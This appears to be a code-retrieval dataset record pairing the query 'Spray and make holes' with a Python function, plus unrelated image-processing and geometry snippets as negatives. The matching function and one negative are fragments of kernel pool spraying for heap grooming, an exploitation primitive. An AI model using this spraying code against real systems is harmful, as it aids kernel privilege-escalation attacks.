A11\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag A11\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = A20\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real A20\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag A20\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t\n\tparamstime = time.time()\n\t# calculate the edge paramters\n\t#\ttanphi = np.imag(A11)/np.real(A11)\n\t#\tphi = np.arctan(tanphi)\n\t#\tcosphi = np.cos(phi)\n\t#\tsinphi = cosphi*tanphi\n\t#\tAl11 = np.real(A11)*cosphi+np.imag(A11)*sinphi\n\t\n\tphi = np.arctan(np.imag(A11)/np.real(A11))\n\tAl11 = np.real(A11)*np.cos(phi)+np.imag(A11)*np.sin(phi)\n\t\n\t#\tAl11 = A11*np.exp(-phi*1j)\n\tl = A20/Al11 # A20 has no imaginary component so A20 = A'20\n\n\tk = 3*Al11/(2*(1-l**2)**(3/2))\n\tparamstime = time.time() - paramstime\n\t\n\t# Plot edge paramters\n\t#\tVCplot = phi\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real phi\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag phi\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = Al11\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real A\\'11\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag A\\'11\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = l\n\t#\tplt.pcolormesh(np.real(VCplot))#,vmin=-5,vmax=5\n\t#\tplt.title(\"real l\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot)) # ,vmin=-5,vmax=5\n\t#\tplt.title(\"imag l\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = k\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real k\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag k\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t\n\t\n\ttreattime = time.time()\n\tif thresholding==True:\n\t\t# do the thresholding\n\t\tif (thrmax<0)&(thr>0):\n\t\t\tknorm = np.sort(k.flatten())[[int(thr*np.size(k)),int(thrmax*np.size(k))]]\n\t\t\tidx = (abs(l)<lmin)&(abs(phi)>phimin)&(abs(k)>knorm[0])\n\t\telif thrmax>0:\n\t\t\tknorm = np.sort(k.flatten())[[int(thr*np.size(k)),int(thrmax*np.size(k))]]\n\t\t\tidx = (abs(l)<lmin)&(abs(phi)>phimin)&(abs(k)>knorm[0])&(abs(k)<knorm[1])\n\t\telif thr<0:\n\t\t\tidx = (abs(l)<lmin)&(abs(phi)>phimin)\n\t\t\tknorm = np.sort(k[idx].flatten())[int(thr)]\n\t\t\tidx = idx&(abs(k)>abs(knorm))\n\t\tne = np.sum(idx)\n\telif thresholding==False:\n\t\traise ValueError(\"this option is not still uncer development\")\n\t\t# no thresholding\n\t\tidx = np.ones(np.shape(l),dtype=bool)\n\t\tne =np.sum(idx)\n\telse:\n\t\traise ValueError(\"thresholding should be boolean\")\n\t\n\t# put all detected points in a vector of (x,y) values\n\tedg = np.zeros((ne,2))\n\torg = np.zeros((ne,2))\n\tnx,ny = np.shape(img)\n\te = 0\n\tfor i in range(nx):\n\t\tfor j in range(ny):\n\t\t\tif idx[i,j]:\n\t\t\t\tedg[e]=np.array([i,j]) + l[i,j]*Ks/2*np.array(\n\t\t\t\t\t[np.sin(phi[i,j]),-np.cos(phi[i,j])])\n\t\t\t\torg[e]=np.array([i,j])\n\t\t\t\te +=1\n\ttreattime = time.time() - treattime\n\ttotaltime = time.time() - totaltime\n\tprint(\"total %0.5f\tconvolution %0.5f\tthresholding %0.5f\tparamters %0.5f\tkernel %0.5f\"%(totaltime,convolvetime,treattime,paramstime,kerneltime))\n\t\n\tif debug==True:\n\t\treturn edg, org, k, l, phi\n\telse:\n\t\treturn edg, org", "def apply_sharpening_on(image):\n # Create kernel\n kernel = np.array([[0, -1, 0],\n [-1, 5, -1],\n 
[0, -1, 0]])\n\n # Sharpen image\n sharp_image = cv2.filter2D(image, -1, kernel)\n return sharp_image", "def fill():\n # Switch in edit mode\n bpy.ops.object.mode_set(mode = 'EDIT')\n \n # Fill hole\n bpy.ops.mesh.fill()", "def opencv_watershed(masked, mask) -> JSON_TYPE:\n # For code and detailed explanation see:\n # http://datahacker.rs/007-opencv-projects-image-segmentation-with-watershed-algorithm/\n threshold: int = 30\n gray = cv2.cvtColor(masked, cv2.COLOR_RGB2GRAY)\n ret, thresh_img = cv2.threshold(gray, threshold, 255, cv2.THRESH_BINARY)\n # Noise removal\n kernel = np.ones((3), np.uint8)\n opening_img = cv2.morphologyEx(thresh_img, cv2.MORPH_OPEN, kernel, iterations=9)\n # Noise removal\n closing_img = cv2.morphologyEx(thresh_img, cv2.MORPH_CLOSE, kernel, iterations=4)\n dist_transform = cv2.distanceTransform(255 - closing_img, cv2.DIST_L2, 3)\n local_max_location = peak_local_max(dist_transform, min_distance=1, indices=True)\n\n n_increases: int = 0\n while local_max_location.shape[0] < 30 and n_increases < 15:\n threshold += 20\n ret, thresh_img = cv2.threshold(gray, threshold, 255, cv2.THRESH_BINARY)\n # Noise removal\n kernel = np.ones((3), np.uint8)\n opening_img = cv2.morphologyEx(thresh_img, cv2.MORPH_OPEN, kernel, iterations=9)\n # Noise removal\n closing_img = cv2.morphologyEx(thresh_img, cv2.MORPH_CLOSE, kernel, iterations=4)\n dist_transform = cv2.distanceTransform(255 - closing_img, cv2.DIST_L2, 3)\n local_max_location = peak_local_max(dist_transform, min_distance=1, indices=True)\n n_increases += 1\n # Reset threshold\n threshold = 30\n\n num_clusters: int = 30\n if n_increases >= 15:\n num_clusters = local_max_location.shape[0]\n kmeans = KMeans(n_clusters=num_clusters)\n # If local_max_location size is 0, return 0 predictions\n if not local_max_location.size:\n return {\n \"count\": 0\n }\n kmeans.fit(local_max_location)\n local_max_location = kmeans.cluster_centers_.copy()\n # Kmeans is returning a float data type so we need to convert it to an int. \n local_max_location = local_max_location.astype(int)\n dist_transform_copy = dist_transform.copy()\n for i in range(local_max_location.shape[0]):\n cv2.circle(dist_transform_copy, (local_max_location[i][1], local_max_location[i][0]), 5, 255)\n # markers = np.zeros_like(dist_transform)\n ret, sure = cv2.threshold(dist_transform, 0.01*dist_transform.max(), 255, 0)\n sure = np.uint8(sure)\n ret, markers = cv2.connectedComponents(sure)\n labels = np.arange(kmeans.n_clusters)\n markers[local_max_location[:,0], local_max_location[:,1]] = labels + 1\n # Convert all local markers to an integer. This because cluster centers will be float numbers. 
\n markers = markers.astype(int)\n markers_copy = markers.copy()\n index_non_zero_markers = np.argwhere(markers != 0)\n markers_copy = markers_copy.astype(np.uint8)\n font = cv2.FONT_HERSHEY_SIMPLEX\n for i in range(index_non_zero_markers.shape[0]):\n string_text = str(markers[index_non_zero_markers[i][0], index_non_zero_markers[i][1]])\n cv2.putText(markers_copy, string_text, (index_non_zero_markers[i][1], index_non_zero_markers[i][0]), font, 1, 255)\n markers = markers.astype(np.int32)\n segmented = cv2.watershed(masked, markers)\n count_segments(markers)\n #return {\n # \"count\": local_max_location.shape[0]\n #}\n return {\n \"count\": count_segments(markers),\n }", "def watershed_segment(M,xM=None,yM=None):\n\n if xM != None and yM != None:\n sel = np.ones((int(ceil(23.9*xM)),int(ceil(23.9*yM)))) # for opening\n sel2 = np.ones((int(ceil(127.2*xM)),int(ceil(127.2*yM)))) # for local thresholding\n sel3 = np.ones((int(ceil(11.9*xM)),int(ceil(11.9*yM)))) # for erosion\n ma,mi =(44245.21*xM*yM),(316.037*xM*yM) \n else:\n selD = np.array([int(M.shape[0]*.012),int(M.shape[1]*.012)])\n selD = np.where(selD!=0,selD,1)\n \n sel2D = np.array([int(M.shape[0]*.12),int(M.shape[1]*.12)])\n sel2D = np.where(sel2D!=0,sel2D,1)\n\n sel3D = np.array([int(M.shape[0]*.01),int(M.shape[1]*.01)])\n sel3D = np.where(sel3D!=0,sel3D,1)\n\n\n sel = np.ones(selD) # for opening\n sel2 = np.ones(sel2D) # for local thresholding\n sel3 = np.ones(sel3D) # for erosion\n ma,mi = (M.shape[0]*M.shape[1]*.0075),(M.shape[0]*M.shape[1]*.0003)\n\n # get a few points in the center of each blob\n \n # threshold\n bw = ((M>=ndi.percentile_filter(M,80,footprint=sel2)))\n #& (M>=stats.scoreatpercentile(M.flatten(),80)))\n\n # open and erode\n blobs = snm.binary_opening(bw,structure=sel)\n blobs = snm.binary_erosion(blobs,structure=sel3,iterations=2)\n \n # label\n labels,_ = ndi.label(blobs)\n labels[labels > 0] += 1\n labels[0,0] = 1\n\n # rescale and cast to int16, then use watershed\n #M2 = rescaled(M,0,65000).astype(np.uint16)\n #newlabels = ndi.watershed_ift(M2,labels)\n newlabels = labels\n \n # get rid of groups unless they have the right number of pixels\n\n counts = np.bincount(newlabels.flatten())\n old2new = np.arange(len(counts)) \n old2new[(counts < int(mi)) | (counts > int(ma))] = 0\n newlabels = old2new[newlabels]\n\n return newlabels", "def RemovePolygonHoles_management(in_fc, threshold=0.0):\n desc = arcpy.Describe(in_fc)\n if desc.dataType != \"FeatureClass\" and desc.dataType != \"ShapeFile\":\n print(\"Invalid data type. 
The input is supposed to be a Polygon FeatureClass or Shapefile.\")\n return\n else:\n if desc.shapeType != \"Polygon\":\n print(\"The input is supposed to be a Polygon FeatureClass or Shapefile.\")\n return\n if threshold < 0.0:\n threshold = 0.0\n with arcpy.da.UpdateCursor(in_fc, [\"SHAPE@\"]) as updateCursor:\n for updateRow in updateCursor:\n shape = updateRow[0]\n new_shape = arcpy.Array()\n for part in shape:\n new_part = arcpy.Array()\n if threshold > 0:\n # find None point in shape part\n # in arcpy module, a None point is used to seperate exterior and interior vertices\n null_point_index = []\n for i in range(len(part)):\n if part[i] is None:\n null_point_index.append(i)\n # if interior vertices exist, create polygons and compare polygon shape area to given threshold\n # if larger, keep vertices, else, dismiss them\n if len(null_point_index) > 0:\n for k in range(0, null_point_index[0]):\n new_part.add(part[k])\n for i in range(len(null_point_index)):\n pointArray = arcpy.Array()\n # determine if the None point is the last one\n if i+1 < len(null_point_index):\n for j in range(null_point_index[i] + 1, null_point_index[i+1]):\n pointArray.add(part[j])\n else:\n for j in range(null_point_index[i] + 1, len(part)):\n pointArray.add(part[j])\n # create a polygon to check shape area against the given threshold\n inner_poly = arcpy.Polygon(pointArray)\n # if larger than threshold, then add to the new part Array\n if inner_poly.area > threshold:\n if i+1 < len(null_point_index):\n for k in range(null_point_index[i], null_point_index[i+1]):\n new_part.add(part[k])\n else:\n for k in range(null_point_index[i], len(part)):\n new_part.add(part[k])\n new_shape.add(new_part)\n # if interior does not exist, add the whole part\n else:\n new_shape.add(part)\n else:\n # get the first None point index\n first_null_point_index = 0\n for i in range(len(part)):\n if part[i] is None:\n first_null_point_index = i\n break\n if first_null_point_index == 0:\n new_shape.add(part)\n else:\n for j in range(first_null_point_index):\n new_part.add(part[j])\n new_shape.add(new_part)\n if len(new_shape) > 0:\n new_poly = arcpy.Polygon(new_shape)\n updateRow[0] = new_poly\n updateCursor.updateRow(updateRow)", "def grass_drass():", "def show_holes_on_img(mask,img):\n labeled, num_objects = ndi.label(mask)\n slices = ndi.find_objects(labeled)\n radius=9\n out_image = img.copy()\n out_image = cv2.cvtColor(out_image, cv2.COLOR_GRAY2RGB)\n for dy,dx in slices:\n x_center = (dx.start + dx.stop - 1)/2\n y_center = (dy.start + dy.stop - 1)/2 \n center=(x_center,y_center)\n cv2.circle(out_image, center, radius,(111,17,108),thickness=2)\n\n plt.figure()\n plt.imshow(out_image)\n plt.autoscale(False)\n return out_image", "def fillHoles(img):\n out,contour,hierarchy = cv2.findContours(img,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_NONE)\n i=0\n for cnt in contour:\n cv2.drawContours(img,contour,i,255,-1)\n i+=1\n return img", "def gen_penalise_field_boundary_pyst_kernel_2d(\n width: int,\n dx: float,\n x_grid_field: np.ndarray,\n y_grid_field: np.ndarray,\n real_t: type,\n num_threads: bool | int = False,\n fixed_grid_size: tuple[int, int] | bool = False,\n) -> Callable:\n # TODO expand docs\n assert width >= 0 and isinstance(width, int), \"invalid zone width\"\n\n if width == 0:\n # bypass option to prevent penalisation, done this way since by\n # default to avoid artifacts one must use penalisation...\n def penalise_field_boundary_pyst_kernel_2d(field: np.ndarray) -> None:\n pass\n\n else:\n pyst_dtype = spu.get_pyst_dtype(real_t)\n 
grid_info = (\n f\"{fixed_grid_size[0]}, {fixed_grid_size[1]}\"\n if type(fixed_grid_size) is tuple[int, ...]\n else \"2D\"\n )\n x_grid_field_start = x_grid_field[0, 0]\n y_grid_field_start = y_grid_field[0, 0]\n x_grid_field_end = x_grid_field[0, -1]\n y_grid_field_end = y_grid_field[-1, 0]\n\n sine_prefactor = (np.pi / 2) / (width * dx)\n\n x_front_boundary_slice = ps.make_slice[:, :width]\n x_front_boundary_kernel_config = spu.get_pyst_kernel_config(\n real_t,\n num_threads,\n iteration_slice=x_front_boundary_slice,\n )\n x_back_boundary_slice = ps.make_slice[:, -width:]\n x_back_boundary_kernel_config = spu.get_pyst_kernel_config(\n real_t,\n num_threads,\n iteration_slice=x_back_boundary_slice,\n )\n\n @ps.kernel\n def penalise_field_x_front_boundary_stencil_2d():\n field, x_grid_field = ps.fields(\n f\"field, x_grid_field : {pyst_dtype}[{grid_info}]\"\n )\n field[0, 0] @= field[0, 0] * sp.sin(\n sine_prefactor * (x_grid_field[0, 0] - x_grid_field_start)\n )\n\n penalise_field_x_front_boundary_kernel_2d = ps.create_kernel(\n penalise_field_x_front_boundary_stencil_2d,\n config=x_front_boundary_kernel_config,\n ).compile()\n\n @ps.kernel\n def penalise_field_x_back_boundary_stencil_2d():\n field, x_grid_field = ps.fields(\n f\"field, x_grid_field : {pyst_dtype}[{grid_info}]\"\n )\n field[0, 0] @= field[0, 0] * sp.sin(\n sine_prefactor * (x_grid_field_end - x_grid_field[0, 0])\n )\n\n penalise_field_x_back_boundary_kernel_2d = ps.create_kernel(\n penalise_field_x_back_boundary_stencil_2d,\n config=x_back_boundary_kernel_config,\n ).compile()\n\n y_front_boundary_slice = ps.make_slice[:width, :]\n y_front_boundary_kernel_config = spu.get_pyst_kernel_config(\n real_t,\n num_threads,\n iteration_slice=y_front_boundary_slice,\n )\n y_back_boundary_slice = ps.make_slice[-width:, :]\n y_back_boundary_kernel_config = spu.get_pyst_kernel_config(\n real_t,\n num_threads,\n iteration_slice=y_back_boundary_slice,\n )\n\n @ps.kernel\n def penalise_field_y_front_boundary_stencil_2d():\n field, y_grid_field = ps.fields(\n f\"field, y_grid_field : {pyst_dtype}[{grid_info}]\"\n )\n field[0, 0] @= field[0, 0] * sp.sin(\n sine_prefactor * (y_grid_field[0, 0] - y_grid_field_start)\n )\n\n penalise_field_y_front_boundary_kernel_2d = ps.create_kernel(\n penalise_field_y_front_boundary_stencil_2d,\n config=y_front_boundary_kernel_config,\n ).compile()\n\n @ps.kernel\n def penalise_field_y_back_boundary_stencil_2d():\n field, y_grid_field = ps.fields(\n f\"field, y_grid_field : {pyst_dtype}[{grid_info}]\"\n )\n field[0, 0] @= field[0, 0] * sp.sin(\n sine_prefactor * (y_grid_field_end - y_grid_field[0, 0])\n )\n\n penalise_field_y_back_boundary_kernel_2d = ps.create_kernel(\n penalise_field_y_back_boundary_stencil_2d,\n config=y_back_boundary_kernel_config,\n ).compile()\n\n def penalise_field_boundary_pyst_kernel_2d(field: np.ndarray) -> None:\n \"\"\"2D penalise field boundary kernel.\n\n Penalises field on the boundaries in a sine wave fashion\n in the given width in X and Y direction\n field: field to be penalised\n \"\"\"\n # first along X\n # these parts involve broadcasting hence couldn't be pystencilized\n field[:, :width] = field[:, (width - 1) : width]\n field[:, -width:] = field[:, -width : (-width + 1)]\n penalise_field_x_front_boundary_kernel_2d(\n field=field, x_grid_field=x_grid_field\n )\n penalise_field_x_back_boundary_kernel_2d(\n field=field, x_grid_field=x_grid_field\n )\n\n # then along Y\n # these parts involve broadcasting hence couldn't be pystencilized\n field[:width, :] = 
field[(width - 1) : width, :]\n field[-width:, :] = field[-width : (-width + 1), :]\n penalise_field_y_front_boundary_kernel_2d(\n field=field, y_grid_field=y_grid_field\n )\n penalise_field_y_back_boundary_kernel_2d(\n field=field, y_grid_field=y_grid_field\n )\n\n return penalise_field_boundary_pyst_kernel_2d", "def set_cell_to_hole(self):\n self.tick = \"H\"\n self.is_hole = True\n self.is_active = False", "def rectangle_mesh_with_hole(point1=Point(0,0), point2=Point(3,1), hole_cent=Point(1.5,0.5), \n hole_rad=0.25, npts=15):\n\n Router = mshr.Rectangle(point1, point2)\n Rinner = mshr.Circle(hole_cent, hole_rad)\n domain = Router - Rinner\n\n mesh = mshr.generate_mesh(domain, npts)\n print_mesh_stats(mesh)\n \n return mesh", "def ghosal_edge_v2(img,Ks,kmin=0,kmax=1000,lmax=0.5,phimin=1,thresholding=True,debug=False,mirror=False):\n\t# gather image properties before its altered\n\tni,nj = np.shape(img)\n\t# Ks must be odd\n\tif Ks%2 != 1:\n\t\tprint(\"Ks must be odd! Continuing with Ks = Ks-1\")\n\t\tKs = Ks-1\n\t# define the rectangular kernels\n\t#Vc00 = np.zeros((Ks,Ks),dtype=complex) # not needed\n\tVc11 = np.zeros((Ks,Ks),dtype=complex)\n\tVc20 = np.zeros((Ks,Ks),dtype=complex)\n\tofs = 1 *(1-1/Ks) # offset for centering kernel around 0,0\n\tfor i in range(Ks):\n\t\tfor j in range(Ks):\n\t\t\tKx = 2*j/Ks-ofs # limits of integration between -1 and 1\n\t\t\tKy = 2*i/Ks-ofs\n\t\t\tif Kx**2+Ky**2 <= 1: # only a circle\n\t\t\t\t#Vc00[i,j] = 1 # the conjugate of V00 # not needed\n\t\t\t\tVc11[i,j] = Kx-Ky*1j # ...\n\t\t\t\tVc20[i,j] = 2*Kx**2+2*Ky**2-1\n\t# mirror the edges to avoid edge effects from convolution\n\tif mirror:\n\t\tthick = int((Ks-1)/2)\n\t\timg = np.concatenate((img[:,(thick-1)::-1],img,img[:,:-(thick+1):-1]),1)\n\t\timg = np.concatenate((img[(thick-1)::-1,:],img,img[:-(thick+1):-1,:]),0)\n\t\tmode = \"valid\"\n\telse:\n\t\tmode = \"same\"\n\t\n\t# do the convolution with the images to get the zernike moments\n\tAnorm = lambda n : (n+1)/np.pi\t# a normalization value\n\t#A00 = scig.convolve2d(img,Vc00,mode='same') # not needed\n\tA11 = Anorm(1)*scig.oaconvolve(img,Vc11,mode=mode)\n\tA20 = Anorm(2)*scig.oaconvolve(img,Vc20,mode=mode)\n\n\tphi = np.arctan(np.imag(A11)/zero_to_small(np.real(A11)))\n\tAl11 = np.real(A11)*np.cos(phi)+np.imag(A11)*np.sin(phi)\n\tl = np.real(A20)/Al11 # A20 has no imaginary component so A20 = A'20\n\tl = np.minimum(l,1-SMALL) # chop off those that go beyond the kernel boundaries\n\tl = np.maximum(l,-1+SMALL)\n\tk = abs(3*Al11/(2*(1-l**2)**(3/2))) \n\t\n\tif thresholding==True:\n\t\t# conditions\n\t\tphi_c = abs(phi)>phimin\n\t\tl_c = abs(l)<lmax\n\t\tk_c = (k<kmax) & (k>kmin)\n\t\tvalid = phi_c & (k_c & l_c)\n\telif thresholding==False:\n\t\tvalid = np.ones_like(k)\n\t# define a grid of pixel positions\n\ti,j = np.meshgrid(np.arange(nj),np.arange(ni))\n\t\n\t# get a list of the valid relevant parameters \n\ti = i[valid]\n\tj = j[valid]\n\t#\tk = k[valid] # not necessary\n\tl = l[valid]\n\tphi = phi[valid]\n\t\n\t# convert to the subpixel position\n\ti_s = i+l*Ks/2*np.cos(phi)\n\tj_s = j+l*Ks/2*np.sin(phi)\n\t\n\t# put all detected points in a vector of (x,y) values\n\tedg = np.squeeze((j_s,i_s)).transpose()\n\torg = np.squeeze((j,i)).transpose()\n\tif debug==True:\n\t\treturn edg, org, k, l, phi\n\telse:\n\t\treturn edg, org", "def fill_single_world():\n if not front_is_clear():\n if not right_is_clear():\n if not left_is_clear():\n put_beeper()", "def create_outer_walls(space,width,height):\n static_lines = [pymunk.Segment(space.static_body, 
(0.0, 0.0), (width, 0.0), 0.0),\n pymunk.Segment(space.static_body, (width, 0.0), (width, height), 0.0),\n pymunk.Segment(space.static_body, (width, height), (0.0, height), 0.0),\n pymunk.Segment(space.static_body, (0.0, 600.0), (0.0, 0.0), 0.0)]\n for line in static_lines:\n line.friction = 0.5\n line.elasticity = 0.9\n\n return static_lines", "def test_rocket():\n ring = [(0,0), (10, 0), (15,5), (10,9), (1,7), (6,4), (0,0)]\n conv = ToPointsAndSegments()\n conv.add_polygon([ring])\n skel = calc_skel(conv, output=True, pause=True)\n print \"DONE\"", "def box_mesh_with_hole(point1=Point(0,0,0), point2=Point(2,1,1), cyl_cent1 = Point(1, -10, 0.5), \n cyl_cent2= Point(1, 10, 0.5), cyl_rad=0.25, numpts=15):\n Router = mshr.Box(point1, point2)\n Rinner = mshr.Cylinder(cyl_cent1, cyl_cent2, cyl_rad, cyl_rad)\n domain = Router - Rinner\n\n mesh = mshr.generate_mesh(domain, numpts)\n print_mesh_stats(mesh)\n \n return mesh", "def ggpl_spiral_staircase(dx,dy,dz):\n\tnstep = int(dy*2.7)+1\n\t\"\"\" steps parameters \"\"\"\n\triserHeight = (0.50*dy)/nstep\n\ttreadDept = (0.6300-riserHeight)/2.0\n\t\"\"\" number of steps and length of landing for each side \"\"\"\n\tlandingLengthY=dy-((nstep+1)*treadDept)\n\tif dx>dy:\n\t\tstepWidth = landingLengthY\n\telse:\n\t\tstepWidth = dx/2.5\n\t\tlandingLengthY = stepWidth\n\tnsteplatox = int(((dx-2*stepWidth)/treadDept)+0.5) \n\tlandingLengthX=stepWidth\n\tnsteplatoy = int(((dy-stepWidth-landingLengthY)/treadDept)+0.5)\n\t\"\"\" skeleton of the box that contains the stair \"\"\"\n\tbox = SKEL_1(CUBOID([dx,dy,dz]))\n\t\"\"\" total steps \"\"\"\n\ttotalSteps = int((dz/riserHeight))\n\t\"\"\" number and height of floor \"\"\"\n\tnfloor = int(round(dz/2)+1)\n\theightfloor = (nsteplatoy)*riserHeight\n\t\"\"\" first stair \"\"\"\n\tstair=make_stair(nsteplatoy,treadDept,riserHeight,landingLengthY+treadDept,stepWidth,1)\n\tstair = T(2)([dy-((nsteplatoy+2)*treadDept)-landingLengthY]) (stair)\n\t\"\"\" variable that takes into account the number of steps made \"\"\"\n\trealizedStep = nsteplatoy\n\tr =4\n\n\t\"\"\" realization of the stairs \"\"\"\n\tfor j in range(int(nfloor)*2):\n\t\t\"\"\" condition for the realization of the final stair \"\"\"\n\t\tif (totalSteps-realizedStep<=nsteplatox) or (totalSteps-realizedStep<=nsteplatoy):\n\t\t\tif (totalSteps-realizedStep<=nsteplatox) and r%2==1:\n\t\t\t\tfinalStair = make_stair((totalSteps-realizedStep-1),treadDept,riserHeight,dy-stepWidth-(totalSteps-realizedStep-1)*treadDept,stepWidth,2)\n\t\t\telse:\n\t\t\t\tfinalStair = make_stair((totalSteps-realizedStep-1),treadDept,riserHeight,dx-stepWidth-(totalSteps-realizedStep-1)*treadDept,stepWidth,2)\n\t\t\t\t\"\"\" rotation and translation of the scale in the correct position \"\"\"\n\t\t\tif r==4:\n\t\t\t\tfinalStair=R([1,2])(3*PI/2)(finalStair)\n\t\t\t\tfinalStair = T([1,2,3])([stepWidth-treadDept,dy,heightfloor])(finalStair)\n\t\t\t\tstair = STRUCT([stair,finalStair])\n\t\t\t\tbreak\n\t\t\tif r==1:\n\t\t\t\tfinalStair = R([1,2])(PI)(finalStair)\n\t\t\t\tfinalStair = T([1,2,3])([dx,dy-landingLengthY+treadDept ,heightfloor])(finalStair)\n\t\t\t\tstair = STRUCT([stair,finalStair])\n\t\t\t\tbreak\n\t\t\tif r==2:\n\t\t\t\tfinalStair = R([1,2])(PI/2)(finalStair)\n\t\t\t\tfinalStair = T([1,2,3])([dx-landingLengthY+treadDept,0,heightfloor])(finalStair)\n\t\t\t\tstair = STRUCT([stair,finalStair])\n\t\t\t\tbreak\n\t\t\tif r==3:\n\t\t\t\tfinalStair = T([1,2,3])([0,stepWidth-treadDept,heightfloor])(finalStair)\n\t\t\t\tstair = 
STRUCT([stair,finalStair])\n\t\t\t\tbreak\n\n\t\telse:\n\t\t\tif j%4== 0:\n\t\t\t\tstepsX = make_stair(nsteplatox,treadDept,riserHeight,landingLengthX,stepWidth,1)\n\t\t\t\tstepsX = R([1,2])(3*PI/2)(stepsX)\n\t\t\t\tstepsX = T([1,2,3])([stepWidth-treadDept,dy,heightfloor])(stepsX)\n\t\t\t\tstair = STRUCT([stair,stepsX])\n\t\t\t\theightfloor += (nsteplatox+1)*riserHeight \n\t\t\t\trealizedStep += nsteplatox+1\n\t\t\t\tr=1\n\t\t\tif j%4== 1:\n\t\t\t\tstepsY = make_stair(nsteplatoy,treadDept,riserHeight,dy-nsteplatoy*treadDept-stepWidth,stepWidth,1)\n\t\t\t\tstepsY = R([1,2])(PI)(stepsY)\n\t\t\t\tstepsY = T([1,2,3])([dx,dy-landingLengthY+treadDept ,heightfloor])(stepsY)\n\t\t\t\tstair = STRUCT([stair,stepsY])\n\t\t\t\theightfloor += (nsteplatoy+1)*riserHeight \n\t\t\t\trealizedStep += nsteplatoy+1\n\t\t\t\tr=2\n\t\t\tif j%4== 2:\n\t\t\t\tstepsX = make_stair(nsteplatox,treadDept,riserHeight,landingLengthX,stepWidth,1)\n\t\t\t\tstepsX = R([1,2])(PI/2)(stepsX)\n\t\t\t\tstepsX = T([1,2,3])([dx-landingLengthY+treadDept,0,heightfloor])(stepsX)\n\t\t\t\tstair = STRUCT([stair,stepsX])\n\t\t\t\theightfloor += (nsteplatox+1)*riserHeight \n\t\t\t\trealizedStep += nsteplatox+1\n\t\t\t\tr=3\n\t\t\tif j%4== 3:\n\t\t\t\tstepsY = make_stair(nsteplatoy,treadDept,riserHeight,landingLengthY,stepWidth,1)\n\t\t\t\tstepsY = T([1,2,3])([0,stepWidth-treadDept,heightfloor])(stepsY)\n\t\t\t\tstair = STRUCT([stair,stepsY])\n\t\t\t\theightfloor += (nsteplatoy+1)*riserHeight \n\t\t\t\trealizedStep += nsteplatoy+1\n\t\t\t\tr=4\n\t\"\"\"floor of the stair\"\"\"\n\tfloor = CUBOID([dx,dy,0.05])\n\tfloor = TEXTURE(\"texture/floorStair.jpg\")(floor)\n\n\treturn STRUCT([stair,floor,box])" ]
[ "0.6130862", "0.61268944", "0.5979253", "0.5935735", "0.5710431", "0.567426", "0.56603324", "0.5653988", "0.5588994", "0.55683285", "0.55645317", "0.55300486", "0.5513504", "0.5508904", "0.54200655", "0.54176503", "0.5407196", "0.5399554", "0.538092", "0.5374664", "0.5373729", "0.5362313", "0.535844", "0.5353101", "0.527628", "0.52744824", "0.52705187", "0.52689344", "0.52563316", "0.524977" ]
0.6215994
0
Spray and make holes
def gimme_the_hole(required_hole_size):
    # Fill the kernel pool with allocations of a suitably sized object type...
    good_object = spray(required_hole_size)
    # ...then release slices of the spray to carve holes of the wanted size.
    make_hole(required_hole_size, good_object)
    return good_object
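gimme_the_hole composes the two primitives: spray() (shown verbatim in the negatives below) fills the pool, then make_hole carves it. The helpers spray() relies on, find_object_to_spray and allocate_object, are not defined in this record; what follows is a hedged, Windows-only sketch using unnamed Event objects as the spray primitive — the object choice, its 0x40 pool size, and both helper bodies are assumptions, not from the source:

# Hedged Windows-only sketch of the helpers gimme_the_hole assumes.
import ctypes

kernel32 = ctypes.windll.kernel32          # Windows-only; handles freed later by make_hole
SPRAY_COUNT = 10000                        # assumed spray volume
pool_object_handles = []                   # filled by spray(), holed by make_hole()
kernel_object_sizes = {"Event": 0x40}      # assumed pool footprint of one Event object

def find_object_to_spray(required_hole_size):
    # Pick an object type whose allocation size divides the hole evenly.
    for name, size in kernel_object_sizes.items():
        if required_hole_size % size == 0:
            return name
    raise ValueError("no sprayable object type fits the requested hole size")

def allocate_object(good_object, i):
    # Each unnamed Event pins one kernel pool allocation via its handle;
    # the spray index i is unused in this simplified sketch.
    return kernel32.CreateEventA(None, False, False, None)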
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def spray(required_hole_size):\n\tglobal pool_object_handles\n\tgood_object = find_object_to_spray(required_hole_size)\n\tfor i in range(SPRAY_COUNT):\n\t\tpool_object_handles.append(allocate_object(good_object, i))\n\tprint \"[+] Spray done!\"\n\treturn good_object", "def route(self):\n pass", "def routes(self, body):\n pass", "def main():\n\n context = yield from Context.create_client_context()\n\n yield from asyncio.sleep(2)\n\n payload = b\"0\"\n request = Message(code=PUT, payload=payload)\n request.opt.uri_host = '192.168.3.2'\n request.opt.uri_path = (\"nodes\", \"48102\", \"humidity\")\n\n response = yield from context.request(request).response\n\n print('Result: %s\\n%r'%(response.code, response.payload))", "def server():", "def server():", "def ring(self):\n pass", "def route( request, c ):", "def receiver():\n def generate(entities_to_proceed):\n \"\"\"Process list of entities populating them with altitude data\"\"\"\n yield \"[\"\n for index, entity in enumerate(entities_to_proceed):\n if 